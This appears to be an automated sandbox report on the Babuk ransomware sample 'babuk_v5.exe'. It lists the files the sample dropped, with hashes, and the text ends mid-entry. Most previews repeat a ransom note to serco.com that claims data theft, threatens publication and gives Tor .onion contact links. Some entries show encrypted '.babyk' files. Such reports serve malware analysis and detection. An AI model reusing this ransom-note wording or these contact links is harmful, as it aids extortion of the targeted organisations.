                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCookies\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetHistory\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\Temp\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\LocalCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\LocalState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\RoamingState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\Settings\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\Settings\roaming.lock.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):168
                                                                            Entropy (8bit):6.58962787557377
                                                                            Encrypted:false
                                                                            SSDEEP:3:tlUmsojldS1C+roi2kkDRSz7Q1qV9glPyU67FrDp9Phll+UxNvEEn:kOS1C2hzkDsM1qVU67ZI0vtn
                                                                            MD5:98DABADFA5DDDEE55518213238E02B7A
                                                                            SHA1:9FCA319009E1652E429144638F50005EE3691BCC
                                                                            SHA-256:4A9D90B85D18F6F17D9908FB74D5C62A31451670552760FC75535E83525E50B1
                                                                            SHA-512:4BA372A02B28FB9978B4D5D9D8F17D71EB3F21B350E8A2DCAB072860BE6B129F9A2942C10C1BA96FB7A117741D4FAF714279BB8ECC8FB80C24E24F6D4C2EE9FF
                                                                            Malicious:false
                                                                            Preview: ......*v.C.B..w...Dh..~.}/%.....-^....7.....".`.;.S..d1..As4.&5!....o@!>BDGl.)P..C.....X.@.m..1.B....x.. /Y........V.6.n.zv.RD....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\Settings\settings.dat.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):8360
                                                                            Entropy (8bit):7.976252945970607
                                                                            Encrypted:false
                                                                            SSDEEP:192:ERH/yMCXDI4KC8iqIV0LdaxZiKSU0TY1Az31HPJw4kQyug2ADx:sfyMCRt84V58xUYYGZvJw4T42ADx
                                                                            MD5:77362D63C79727AF6A299126C5863980
                                                                            SHA1:D0CB926279AB9397A5B252482B4C13B5A5DAE461
                                                                            SHA-256:B176F4B9CC123B9C4ABDA1088435C2B0189BBAF602B3DC2D8D5DBA4D969D692C
                                                                            SHA-512:FE3DE029B31E11A789D7A26AD19DD44938EB0CF4BEF8EE4EEF66E91B063C24ABB3B3E11610987B47DF59DAF8782FE5C7C399A47F0C6618AB4867A2EA427C9A2A
                                                                            Malicious:false
                                                                            Preview: ..M...>W.6.iAE..?....W..".!..$/:.l...<.B...H.U....M...U..?.K....|.`..m.......9~..'.....i.d1...l.t...V....HR.C....oHC@.98....\q....o....l.nB.....4p.S.d..g....G.>...).D.VW.)S..q.E...K(.....D..<..U....y.`...S......,...e.e?.Q?qY7.q:...~+.2B.5a.i.~."..e.#.;....l..<.H~.*]..,.W...Cwx..vK.w"........PR^.0d.....QL...w.q...E..........R5z..3..xc.<w.......[.b...u..'{..kg.~.Fn.L.(......K..9.:....>aS..iaH(`lh.b..=.,......\mi.7.T..e...T....q~...)VNC....S<....%.m...|......v.w7.z.b....pJ?..uG.I.XVP.,.....YM..F.!.X:....5.......<6.....ly.8.g..]p.8=.....;...S.......j0...^.]=...w.zWg.~5MV....WSzg"X.]..9.W.....2{...$Y.>.?:ss..Hz9............gB..M...Jr..t......s.bb.}....3Y.~=....'.f...X..{h..B...bkncu.;.1~..9.^4(S..D...,...N..E............5.m.e..\'.4........j=...g...lwj....^.m..E..^TY.._..0[........3B.(.>...t.O.t..F....d]>.w...}`+..z......;Z..\;...f?..W.......5$.<.l......D.J.B.q1....1..."..f.~.+0+P....d.,.....e.K|..$...}..5..7*.c...6..........Ra.E.w...+N..D...4
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\SystemAppData\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\TempState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\AC\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\AC\INetCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\AC\INetCookies\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\AC\INetHistory\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\AC\Temp\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
